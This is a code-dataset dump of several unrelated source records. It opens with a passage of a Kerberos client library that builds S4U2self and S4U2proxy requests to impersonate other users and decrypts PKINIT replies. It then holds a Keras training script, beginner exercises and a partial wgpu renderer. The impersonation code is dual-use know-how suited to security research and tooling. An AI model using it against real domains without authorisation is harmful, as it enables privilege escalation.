Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\t\t\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\t\t\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\t\t\n\t\t\n\t\tpa_data_auth = {}\n\t\tpa_data_auth['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_data_auth['padata-value'] = AP_REQ(ap_req).dump()\n\t\t\n\t\t###### Calculating checksum data\n\t\t\n\t\tS4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)\n\t\tS4UByteArray += user_to_impersonate.username.encode()\n\t\tS4UByteArray += user_to_impersonate.domain.encode()\n\t\tS4UByteArray += auth_package_name.encode()\n\t\tlogger.debug('[S4U2self] S4UByteArray: %s' % S4UByteArray.hex())\n\t\tlogger.debug('[S4U2self] S4UByteArray: %s' % S4UByteArray)\n\t\t\n\t\tchksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)\n\t\tlogger.debug('[S4U2self] chksum_data: %s' % chksum_data.hex())\n\t\t\n\t\t\n\t\tchksum = {}\n\t\tchksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))\n\t\tchksum['checksum'] = chksum_data\n\n\t\t\n\t\t###### Filling out PA-FOR-USER data for impersonation\n\t\tpa_for_user_enc = {}\n\t\tpa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})\n\t\tpa_for_user_enc['userRealm'] = 
user_to_impersonate.domain\n\t\tpa_for_user_enc['cksum'] = Checksum(chksum)\n\t\tpa_for_user_enc['auth-package'] = auth_package_name\n\t\t\n\t\tpa_for_user = {}\n\t\tpa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))\n\t\tpa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()\n\t\n\t\t###### Constructing body\n\t\tif spn_user is not None:\n\t\t\tif isinstance(spn_user, str):\n\t\t\t\tspn_user = [spn_user]\n\t\t\telif isinstance(spn_user, list):\n\t\t\t\tspn_user = spn_user\n\t\t\telse:\n\t\t\t\tspn_user = spn_user.get_principalname()\n\t\telse:\n\t\t\tspn_user = self.credential.username.split('/')\n\n\t\t\n\t\tkrb_tgs_body = {}\n\t\tkrb_tgs_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkrb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': spn_user})\n\t\tkrb_tgs_body['realm'] = self.credential.domain.upper()\n\t\tkrb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkrb_tgs_body['nonce'] = secrets.randbits(31)\n\t\tkrb_tgs_body['etype'] = [self.kerberos_session_key.enctype] #[supp_enc.value] #selecting according to server's preferences\n\t\t\n\t\t\n\t\tkrb_tgs_req = {}\n\t\tkrb_tgs_req['pvno'] = krb5_pvno\n\t\tkrb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkrb_tgs_req['padata'] = [pa_data_auth, pa_for_user]\n\t\tkrb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)\n\t\t\n\t\treq = TGS_REQ(krb_tgs_req)\n\t\t\n\t\tlogger.debug('[S4U2self] Sending request to server')\n\t\t\n\t\treply = self.ksoc.sendrecv(req.dump())\n\t\tif reply.name == 'KRB_ERROR':\n\t\t\temsg = 'S4U2self failed!'\n\t\t\tif reply.native['error-code'] == 16:\n\t\t\t\temsg = 'S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account!'\t\t\t\n\t\t\traise KerberosError(reply, emsg)\n\t\t\n\t\tlogger.debug('[S4U2self] Got reply, decrypting...')\n\t\ttgs = reply.native\n\t\t\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\t\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('[S4U2self] Got valid TGS reply')\n\t\tself.kerberos_TGS = tgs\n\t\treturn tgs, encTGSRepPart, key\n\t\t\t\t\n\t# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b\n\tdef S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):\n\t\tlogger.debug('[S4U2proxy] Impersonating %s' % '/'.join(spn_user.get_principalname()))\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tsupp_enc = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\t\n\t\tpa_pac_opts = {}\n\t\tpa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))\n\t\tpa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()\n\n\t\t\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\t\t\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), 
None)\n\t\t\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\t\t\n\t\tpa_tgs_req = {}\n\t\tpa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()\n\t\t\n\t\t\n\t\tkrb_tgs_body = {}\n\t\t#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))\n\t\tkrb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))\n\t\tkrb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})\n\t\tkrb_tgs_body['realm'] = self.credential.domain.upper()\n\t\tkrb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkrb_tgs_body['nonce'] = secrets.randbits(31)\n\t\tkrb_tgs_body['etype'] = [self.kerberos_session_key.enctype] #[supp_enc.value] #selecting according to server's preferences\n\t\tkrb_tgs_body['additional-tickets'] = [s4uself_ticket]\n\t\t\n\t\t\n\t\tkrb_tgs_req = {}\n\t\tkrb_tgs_req['pvno'] = krb5_pvno\n\t\tkrb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkrb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]\n\t\tkrb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)\n\t\t\n\t\treq = TGS_REQ(krb_tgs_req)\n\t\t\n\t\treply = self.ksoc.sendrecv(req.dump())\n\t\tif reply.name == 'KRB_ERROR':\n\t\t\temsg = 'S4U2proxy failed!'\n\t\t\tif reply.native['error-code'] == 16:\n\t\t\t\temsg = 'S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account!'\n\t\t\t\n\t\t\traise KerberosError(reply, emsg)\n\t\t\n\t\tlogger.debug('[S4U2proxy] Got server reply, decrypting...')\n\t\ttgs = reply.native\n\t\t\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\t\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('[S4U2proxy] Got valid TGS reply')\n\n\t\treturn tgs, encTGSRepPart, key\n\t\t\n\n\tdef construct_apreq(self, tgs, encTGSRepPart, sessionkey, flags = None, seq_number = 0, ap_opts = [], cb_data = None):\n\t\treturn construct_apreq_from_tgs_tgt(\n\t\t\ttgs, \n\t\t\tsessionkey, \n\t\t\tself.kerberos_TGT, \n\t\t\tflags = flags, \n\t\t\tseq_number = seq_number, \n\t\t\tap_opts = ap_opts, \n\t\t\tcb_data = cb_data\n\t\t)\n\n\tdef getST(self, target_user, service_spn):\n\t\ttgs, encTGSRepPart, key = self.S4U2self(target_user)\n\t\treturn self.S4U2proxy(tgs['ticket'], service_spn)\n\n\tdef decrypt_asrep_cert(self, as_rep):\n\t\t\n\t\tdef truncate_key(value, keysize):\n\t\t\toutput = b''\n\t\t\tcurrentNum = 0\n\t\t\twhile len(output) < keysize:\n\t\t\t\tcurrentDigest = hashlib.sha1(bytes([currentNum]) + value).digest()\n\t\t\t\tif len(output) + len(currentDigest) > keysize:\n\t\t\t\t\toutput += currentDigest[:keysize - len(output)]\n\t\t\t\t\tbreak\n\t\t\t\toutput += currentDigest\n\t\t\t\tcurrentNum += 1\n\t\t\t\n\t\t\treturn output\n\n\t\tfor pa in as_rep['padata']:\n\t\t\tif pa['padata-type'] == 17:\n\t\t\t\tpkasrep = PA_PK_AS_REP.load(pa['padata-value']).native\n\t\t\t\tbreak\n\t\telse:\n\t\t\traise Exception('PA_PK_AS_REP not 
found!')\n\n\t\ttry:\n\t\t\tsd = cms.SignedData.load(pkasrep['dhSignedData']).native\n\t\texcept:\n\t\t\tsd = cms.SignedData.load(pkasrep['dhSignedData'][19:]).native # !!!!!!!!!!!!! TODO: CHECKTHIS!!! Sometimes there is an OID before the struct?!\n\t\n\t\tkeyinfo = sd['encap_content_info']\n\t\tif keyinfo['content_type'] != '1.3.6.1.5.2.3.2':\n\t\t\traise Exception('Keyinfo content type unexpected value')\n\t\tauthdata = KDCDHKeyInfo.load(keyinfo['content']).native\n\t\tpubkey = int(''.join(['1'] + [str(x) for x in authdata['subjectPublicKey']]), 2)\t\t\n\n\t\tpubkey = int.from_bytes(core.BitString(authdata['subjectPublicKey']).dump()[7:], 'big', signed = False) # !!!!!!!!!!!!! TODO: CHECKTHIS!!!\n\t\tshared_key = self.credential.dhparams.exchange(pubkey)\n\t\t\n\t\tserver_nonce = pkasrep['serverDHNonce']\n\t\tfullKey = shared_key + self.credential.dhparams.dh_nonce + server_nonce\n\n\t\tetype = as_rep['enc-part']['etype']\n\t\tcipher = _enctype_table[etype]\n\t\tif etype == Enctype.AES256:\n\t\t\tself.pkinit_tkey = truncate_key(fullKey, 32)\n\t\telif etype == Enctype.AES128:\n\t\t\tself.pkinit_tkey = truncate_key(fullKey, 16)\n\t\telif etype == Enctype.RC4:\n\t\t\traise NotImplementedError('RC4 key truncation documentation missing. it is different from AES')\n\t\t\t#self.pkinit_tkey = truncate_key(fullKey, 16)\n\t\t\n\n\t\tkey = Key(cipher.enctype, self.pkinit_tkey)\n\t\tenc_data = as_rep['enc-part']['cipher']\n\t\tdec_data = cipher.decrypt(key, 3, enc_data)\n\t\tencasrep = EncASRepPart.load(dec_data).native\n\t\tcipher = _enctype_table[ int(encasrep['key']['keytype'])]\n\t\tsession_key = Key(cipher.enctype, encasrep['key']['keyvalue'])\n\t\treturn encasrep, session_key, cipher\n\n\n\t","sub_path":"minikerberos/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":32290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329204630","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom collections import defaultdict \nimport sys\nimport os\nimport matplotlib.pyplot as plt\nfrom tabulate import tabulate\nimport time\nimport keras \nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Input, Dropout, Embedding, LSTM, Flatten, Lambda\nfrom sklearn.preprocessing import OneHotEncoder, MinMaxScaler\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom sklearn import preprocessing\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.cross_validation import train_test_split\nfrom keras.utils.vis_utils import plot_model\n\n\n# In[5]:\n\n\nADDR = '/nfs_home/nbhardwaj/data/rds_final/'\nw_ADDR = '/nfs_home/nbhardwaj/model_weights/finalwts/'\n\n\n# In[6]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\n\nclass LabelEncoderExt(object):\n def __init__(self):\n \"\"\"\n It differs from LabelEncoder by handling new classes and providing a value for it [Unknown]\n Unknown will be added in fit and transform will take care of new item. 
It gives unknown class id\n \"\"\"\n self.label_encoder = LabelEncoder()\n # self.classes_ = self.label_encoder.classes_\n\n def fit(self, data_list):\n \"\"\"\n This will fit the encoder for all the unique values and introduce unknown value\n :param data_list: A list of string\n :return: self\n \"\"\"\n self.label_encoder = self.label_encoder.fit(list(data_list) + ['Unknown'])\n self.classes_ = self.label_encoder.classes_\n\n return self\n\n def transform(self, data_list):\n \"\"\"\n This will transform the data_list to id list where the new values get assigned to Unknown class\n :param data_list:\n :return:\n \"\"\"\n new_data_list = list(data_list)\n m = {}\n for x in self.label_encoder.classes_:\n m[x] = True\n for ind, y in enumerate(new_data_list):\n if(m.get(y) is None):\n new_data_list[ind] = 'Unknown'\n# for unique_item in np.unique(data_list):\n# if unique_item not in self.label_encoder.classes_:\n# new_data_list = ['Unknown' if x==unique_item else x for x in new_data_list]\n return self.label_encoder.transform(new_data_list)\n \n\n\n# In[ ]:\n\n\ndef create_model(embed_size = 10):\n inp1 = Input(shape = (1,))\n inp2 = Input(shape = (1,))\n inp3 = Input(shape = (1,))\n\n embed1 = Embedding(len(le_inst.classes_), embed_size, input_length = 1)(inp1)\n embed2 = Embedding(len(le_delta.classes_), embed_size, input_length = 1)(inp2)\n\n merged_inp = keras.layers.concatenate([embed1, embed2], axis = 1)\n merged_inp = Flatten()(merged_inp)\n merged_inp = keras.layers.concatenate([merged_inp, inp3])\n \n# out = LSTM(64)(merged_inp)\n out = Dense(32, activation = 'relu')(merged_inp)\n out = Dense(8, activation = 'softmax')(out)\n\n model = Model([inp1, inp2, inp3], out)\n return model\n\n\n# In[ ]:\n\n\n# sets = [x for x in range(18, 64)]\nsets = [51]\ninst_vocab = []\ndelta_vocab = []\ntrain_acc = []\ntest_acc = []\nlens = []\n# print(\"enter file name -_--------------------------->\")\n# fname = input()\n# fname = str(fname)\nfname = '648'\n#make dir for saving model weights\nw_ADDR = w_ADDR + str(fname)\nif(not os.path.isdir(w_ADDR)):\n if(os.system('mkdir '+ w_ADDR) != 0):\n print(\"error creating dir \"+fname)\n exit()\nfor cset in sets:\n start = time.time()\n df = pd.read_csv(ADDR+fname+'_'+str(cset)+'.csv', index_col = [0], usecols = [0, 2, 4, 7, 8], nrows = 100000000)\n df.Mode = np.where(df.Mode.values=='R', 1, -1)\n df.Mode = df['Mode'].astype('str')\n df.Instruction = df.Instruction.astype('str')\n df.delta = df.delta.astype('float')\n \n X = df[['Instruction', 'delta', 'Mode']].values[1:]\n y = df[['label']].values[1:]\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.40, random_state = 42)\n print(\"--------------------split done---------------------\")\n le_inst = LabelEncoderExt()\n le_inst.fit(X_train[:, 0])\n le_delta = LabelEncoderExt()\n le_delta.fit(X_train[:, 1])\n print(\"----------------labels done----------------------\")\n X_train[:, 0] = le_inst.transform(X_train[:, 0])\n X_train[:, 1] = le_delta.transform(X_train[:, 1])\n print(\"--------\")\n \n X_test[:, 0] = le_inst.transform(X_test[:, 0])\n X_test[:, 1] = le_delta.transform(X_test[:, 1])\n print(\"-------------------labels transformed---------------------\")\n model = create_model()\n model.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n es = EarlyStopping(monitor = 'val_loss', mode = 'min', verbose = 1, patience = 2)\n filepath = w_ADDR+'/'+str(cset)+'.hdf5'\n mc = ModelCheckpoint(filepath, monitor = 'val_accuracy', save_best_only = True, mode 
= 'max')\n    history = model.fit([X_train[:, 0], X_train[:, 1], X_train[:, 2]], to_categorical(y_train), epochs = 50, \n                        validation_split = 0.2, use_multiprocessing = True, verbose = 2, callbacks = [es, mc])\n    print(\"------------training done------------\")\n    t_ac = model.evaluate([X_test[:, 0], X_test[:, 1], X_test[:, 2]], to_categorical(y_test))[1]\n    test_acc.append(t_ac)\n    tr_ac = model.evaluate([X_train[:, 0], X_train[:, 1], X_train[:, 2]], to_categorical(y_train))[1]\n    train_acc.append(tr_ac)\n    inst_vocab.append(len(le_inst.classes_))\n    delta_vocab.append(len(le_delta.classes_))\n    end = time.time()\n    print(\"--------------done processing for set---------->\", cset, \"|| time->\", end-start, \"s\")\n    print(\"train acc-->\", tr_ac)\n    print(\"test acc--->\", t_ac)\ndf2 = pd.DataFrame(list(zip(train_acc, test_acc, lens)), columns = ['train_accuracy', 'test_accuracy','length'])\ndf2.to_csv(w_ADDR+'/acc.csv')\n\n\n# In[34]:\n\n\n# history.history.keys()\n\n\n# In[35]:\n\n\n# plt.plot(history.history['loss'], label = 'train')\n# plt.plot(history.history['val_loss'] , label = 'validation')\n# plt.legend()\n# plt.xlabel('epochs')\n# plt.ylabel('loss')\n# plt.show()\n\n\n# In[ ]:\n\n\n# how to load the stored model\n\n# from keras.models import load_model\n# saved_model = load_model(filepath)\n# tr_ac = model.evaluate([X_train[:, 0], X_train[:, 1], X_train[:, 2]], to_categorical(y_train))[1]\n# print(\"train acc--->\", tr_ac)\n\n","sub_path":"RD_Embedding- basic.py","file_name":"RD_Embedding- basic.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594694932","text":"'''\n4-4. One Million\nMake a list of the numbers from 1 to one million and use a for loop to print them (if printing takes too long, press Ctrl-C or just close the output window).\n\nOutput:\n1\n2\n...\n999999\n1000000\n'''\n\nnumbers = list(range(1, 1000001))\n\nfor number in numbers:\n    print(number)\n\n","sub_path":"solutions/ch4/4_4_b.py","file_name":"4_4_b.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1434350","text":"# Filename: ProgrammingExercise11.py\r\n# Author: N. Anim\r\n# Date: Feb. 22, 2016\r\n# Purpose: To solve the programming exercise 11 on page 170\r\n# in the text. It is to determine the number of minutes,\r\n# hours, and days in the given number of seconds.\r\n\r\n
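# Illustrative example: 90061 seconds works out to about 1501.02 minutes,\r\n# 25.02 hours, and 1.04 days under the formulas below.\r\n\r\n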
# Constants\r\nSECONDSPERMINUTE = 60\r\nSECONDSPERHOUR = 3600\r\nSECONDSPERDAY = 86400\r\n\r\n# Prompt for and read the number of seconds\r\nseconds = int(input('Enter an integer for seconds: '))\r\n\r\n# Display the number of minutes in that many seconds\r\nif (seconds >= SECONDSPERMINUTE):\r\n    minutes = seconds / SECONDSPERMINUTE\r\n    print('There are %.2f minutes in %d seconds.'% (minutes, seconds))\r\n\r\n# Display the number of hours in that many seconds\r\nif (seconds >= SECONDSPERHOUR):\r\n    hours = seconds / SECONDSPERHOUR\r\n    print('There are %.2f hours in %d seconds.'% (hours, seconds))\r\n\r\n# Display the number of days in that many seconds\r\nif (seconds >= SECONDSPERDAY):\r\n    days = seconds / SECONDSPERDAY\r\n    print('There are %.2f days in %d seconds.'% (days, seconds))\r\n","sub_path":"Programs/ProgrammingExercise11.py","file_name":"ProgrammingExercise11.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"626000482","text":"import python_shader # noqa\nfrom python_shader import Struct, vec2, mat4\nimport wgpu.backends.rs\n\nfrom .. import Renderer, RenderFunctionRegistry\nfrom ...objects import WorldObject\nfrom ...cameras import Camera\nfrom ...linalg import Matrix4, Vector3\nfrom ...datawrappers import BaseBuffer, Buffer, TextureView\nfrom ...utils import array_from_shadertype\n\n\n# Definition uniform struct with standard info related to transforms,\n# provided to each shader as uniform at slot 0.\nstdinfo_uniform_type = Struct(\n    world_transform=mat4,\n    cam_transform=mat4,\n    projection_transform=mat4,\n    physical_size=vec2,\n    logical_size=vec2,\n)\n\n\nregistry = RenderFunctionRegistry()\n\nvisibility_all = (\n    wgpu.ShaderStage.VERTEX | wgpu.ShaderStage.FRAGMENT | wgpu.ShaderStage.COMPUTE\n)\n\n\ndef register_wgpu_render_function(wobject_cls, material_cls):\n    \"\"\" Decorator to register a WGPU render function.\n    \"\"\"\n\n    def _register_wgpu_renderer(f):\n        registry.register(wobject_cls, material_cls, f)\n        return f\n\n    return _register_wgpu_renderer\n\n\nclass RenderInfo:\n    \"\"\" The type of object passed to each wgpu render function together\n    with the world object. Contains stdinfo buffer for now. In time\n    will probably also include lights etc.\n    \"\"\"\n\n    def __init__(self, *, stdinfo):\n        self.stdinfo = stdinfo\n\n\nclass WgpuRenderer(Renderer):\n    \"\"\" A renderer that renders to a surface.\n    \"\"\"\n\n    def __init__(self, canvas):\n        self._canvas = canvas\n\n        self._pipelines = []\n\n        self._adapter = wgpu.request_adapter(\n            canvas=canvas, power_preference=\"high-performance\"\n        )\n        self._device = self._adapter.request_device(extensions=[], limits={})\n\n        self._swap_chain = self._device.configure_swap_chain(\n            canvas, wgpu.TextureFormat.bgra8unorm_srgb,\n        )\n        self._depth_texture_size = (0, 0)\n\n    def render(self, scene: WorldObject, camera: Camera):\n        \"\"\" Main render method, called from the canvas.\n        \"\"\"\n\n        # todo: support for alt render pipelines (object that renders to texture then renders that)\n        # todo: also note that the fragment shader is (should be) optional\n        # (e.g. 
depth only passes like shadow mapping or z prepass)\n\n device = self._device\n physical_size = self._canvas.get_physical_size() # 2 ints\n logical_size = self._canvas.get_logical_size() # 2 floats\n # pixelratio = self._canvas.get_pixel_ratio()\n\n # Ensure that matrices are up-to-date\n scene.update_matrix_world()\n camera.update_matrix_world() # camera may not be a member of the scene\n camera.update_projection_matrix()\n\n # Get the sorted list of objects to render (guaranteed to be visible and having a material)\n proj_screen_matrix = Matrix4().multiply_matrices(\n camera.projection_matrix, camera.matrix_world_inverse\n )\n q = self.get_render_list(scene, proj_screen_matrix)\n\n # Ensure each wobject has pipeline info\n for wobject in q:\n self._make_up_to_date(wobject)\n\n # Filter out objects that we cannot render\n q = [wobject for wobject in q if wobject._wgpu_data is not None]\n\n # Prepate depth texture\n if self._depth_texture_size != physical_size:\n self._depth_texture_size = physical_size\n self._depth_texture = device.create_texture(\n size=(physical_size[0], physical_size[1], 1),\n usage=wgpu.TextureUsage.OUTPUT_ATTACHMENT,\n dimension=\"2d\",\n format=wgpu.TextureFormat.depth32float,\n )\n self._depth_texture_view = self._depth_texture.create_view()\n self._depth_texture.destroy()\n\n # Prepare for rendering\n command_encoder = device.create_command_encoder()\n command_buffers = []\n\n # Update stdinfo buffer for all objects\n # todo: a lot of duplicate data here. Let's revisit when we implement point / line collections.\n for wobject in q:\n wgpu_data = wobject._wgpu_data\n stdinfo = wgpu_data[\"stdinfo\"]\n stdinfo.data[\"world_transform\"] = tuple(wobject.matrix_world.elements)\n stdinfo.data[\"cam_transform\"] = tuple(camera.matrix_world_inverse.elements)\n stdinfo.data[\"projection_transform\"] = tuple(\n camera.projection_matrix.elements\n )\n stdinfo.data[\"physical_size\"] = physical_size\n stdinfo.data[\"logical_size\"] = logical_size\n stdinfo.update_range(0, 1)\n self._update_buffer(stdinfo)\n\n # ----- compute pipelines\n\n compute_pass = command_encoder.begin_compute_pass()\n\n for wobject in q:\n wgpu_data = wobject._wgpu_data\n for pinfo in wgpu_data[\"compute_pipelines\"]:\n compute_pass.set_pipeline(pinfo[\"pipeline\"])\n for bind_group_id, bind_group in enumerate(pinfo[\"bind_groups\"]):\n compute_pass.set_bind_group(\n bind_group_id, bind_group, [], 0, 999999\n )\n compute_pass.dispatch(*pinfo[\"index_args\"])\n\n compute_pass.end_pass()\n\n # ----- render pipelines rendering to the default target\n\n with self._swap_chain as texture_view_target:\n\n render_pass = command_encoder.begin_render_pass(\n color_attachments=[\n {\n \"attachment\": texture_view_target,\n \"resolve_target\": None,\n \"load_value\": (0, 0, 0, 0), # LoadOp.load or color\n \"store_op\": wgpu.StoreOp.store,\n }\n ],\n depth_stencil_attachment={\n \"attachment\": self._depth_texture_view,\n \"depth_load_value\": 10 ** 38,\n \"depth_store_op\": wgpu.StoreOp.store,\n \"stencil_load_value\": wgpu.LoadOp.load,\n \"stencil_store_op\": wgpu.StoreOp.store,\n },\n occlusion_query_set=None,\n )\n\n for wobject in q:\n wgpu_data = wobject._wgpu_data\n for pinfo in wgpu_data[\"render_pipelines\"]:\n render_pass.set_pipeline(pinfo[\"pipeline\"])\n for slot, vbuffer in enumerate(pinfo[\"vertex_buffers\"]):\n render_pass.set_vertex_buffer(\n slot,\n vbuffer._wgpu_buffer,\n vbuffer.vertex_byte_range[0],\n vbuffer.vertex_byte_range[1],\n )\n for bind_group_id, bind_group in 
enumerate(pinfo[\"bind_groups\"]):\n render_pass.set_bind_group(bind_group_id, bind_group, [], 0, 99)\n # Draw with or without index buffer\n if pinfo[\"index_buffer\"] is not None:\n ibuffer = pinfo[\"index_buffer\"]\n render_pass.set_index_buffer(ibuffer, 0, ibuffer.size)\n render_pass.draw_indexed(*pinfo[\"index_args\"])\n else:\n render_pass.draw(*pinfo[\"index_args\"])\n\n render_pass.end_pass()\n\n command_buffers.append(command_encoder.finish())\n device.default_queue.submit(command_buffers)\n\n # -----\n\n def get_render_list(self, scene: WorldObject, proj_screen_matrix: Matrix4):\n \"\"\" Given a scene object, get a list of objects to render.\n \"\"\"\n\n # start by gathering everything that is visible and has a material\n q = []\n\n def visit(wobject):\n nonlocal q\n if wobject.visible and hasattr(wobject, \"material\"):\n q.append(wobject)\n\n scene.traverse(visit)\n\n # next, sort them from back-to-front\n def sort_func(wobject: WorldObject):\n z = (\n Vector3()\n .set_from_matrix_position(wobject.matrix_world)\n .apply_matrix4(proj_screen_matrix)\n .z\n )\n return wobject.render_order, z\n\n return list(sorted(q, key=sort_func))\n\n def _make_up_to_date(self, wobject):\n \"\"\" Update the GPU objects associated with the given wobject. Returns\n quickly if no changes are needed.\n \"\"\"\n\n # Can return fast?\n if not wobject.material.dirty and hasattr(wobject, \"_wgpu_data\"):\n return\n\n wobject.material.dirty = False\n\n # Need a pipeline reset?\n if getattr(wobject.material, \"_wgpu_pipeline_dirty\", False):\n wobject._wgpu_pipeline_infos = None\n\n # Do we need to create the pipeline infos (from the renderfunc for this wobject)?\n if getattr(wobject, \"_wgpu_pipeline_infos\", None) is None:\n wobject._wgpu_data = None\n wobject._wgpu_pipeline_infos = self._get_pipeline_infos(wobject)\n\n # This could be enough\n if wobject._wgpu_pipeline_infos is None:\n wobject._wgpu_data = None\n return\n\n # Check if we need to update any resources\n # todo: this seems like a lot of work, can we keep track of what objects\n # need an update with higher precision?\n for pipeline_info in wobject._wgpu_pipeline_infos:\n buffer = pipeline_info.get(\"index_buffer\", None)\n if buffer is not None:\n self._update_buffer(buffer)\n for buffer in pipeline_info.get(\"vertex_buffers\", []):\n self._update_buffer(buffer)\n for key in pipeline_info.keys():\n if key.startswith(\"bindings\"):\n resources = pipeline_info[key]\n if isinstance(resources, dict):\n resources = resources.values()\n for binding_type, resource in resources:\n if binding_type in (\n wgpu.BindingType.uniform_buffer,\n wgpu.BindingType.storage_buffer,\n wgpu.BindingType.readonly_storage_buffer,\n ):\n assert isinstance(resource, BaseBuffer)\n self._update_buffer(resource)\n elif binding_type in (\n wgpu.BindingType.sampled_texture,\n wgpu.BindingType.readonly_storage_texture,\n wgpu.BindingType.writeonly_storage_texture,\n ):\n assert isinstance(resource, TextureView)\n self._update_texture(resource.texture)\n self._update_texture_view(resource)\n elif binding_type in (\n wgpu.BindingType.sampler,\n wgpu.BindingType.comparison_sampler,\n ):\n assert isinstance(resource, TextureView)\n self._update_sampler(resource)\n\n # Create gpu data?\n if wobject._wgpu_data is None:\n wobject._wgpu_data = self._get_pipeline_objects(wobject)\n\n def _get_pipeline_infos(self, wobject):\n\n # Make sure that the wobject has an stdinfo object\n if not hasattr(wobject, \"_wgpu_stdinfo_buffer\"):\n wobject._wgpu_stdinfo_buffer = Buffer(\n 
